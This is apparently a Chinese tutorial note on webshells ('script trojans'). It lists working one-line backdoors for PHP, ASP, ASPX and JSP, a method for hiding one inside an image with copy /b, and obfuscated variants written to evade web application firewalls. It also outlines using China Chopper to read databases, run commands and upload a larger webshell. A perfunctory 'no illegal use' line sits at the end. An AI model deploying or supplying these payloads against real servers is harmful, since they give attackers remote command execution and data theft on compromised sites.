某教程学习笔记（一）：13、脚本木马原理

我和她说，如果有天你要离开我，你就跟我掰手腕，赢了你就让你走，她说我那么瘦小怎么会赢。后来她真的要和我分手，我把右手放在桌子上，眼看我要赢的时候，她把左手放到右手上，我抬头看她咬着牙眼里含着泪，我知道她真得要离开我了。。。

                                                                                                                                                                 ----  网易云热评

一、一句话木马，隐蔽性强，功能强大，为上传大马做准备

1、php一句话

<?php @eval($_POST['aiyou']);?>

将一句话上传到服务器

用菜刀连接

读取数据库

终端运行命令

2、asp一句话

<% eval request("aiyou") %>

3、aspx一句话

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"],"unsafe");%>

4、jsp一句话

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

5、图片马

cmd下做一句话

copy /b1.jpg+1.php 2.jpg

C32ASM做一句话

二、一句话变形,waf会拦截一句话，可以通过变形绕过

<?php $_request['a']($_request['b']); ?>

<%eval(request(chr(112)))%>

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("aiyou"))%>

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&-"&"5"&")"&")")%>

<%a=request("aiyou")%><%eval a%>

三、大马，功能比小马的功能更加强大

上传小马后用菜刀连接，然后再通过菜刀上传大马

禁止非法，后果自负

欢迎关注公众号：web安全工具库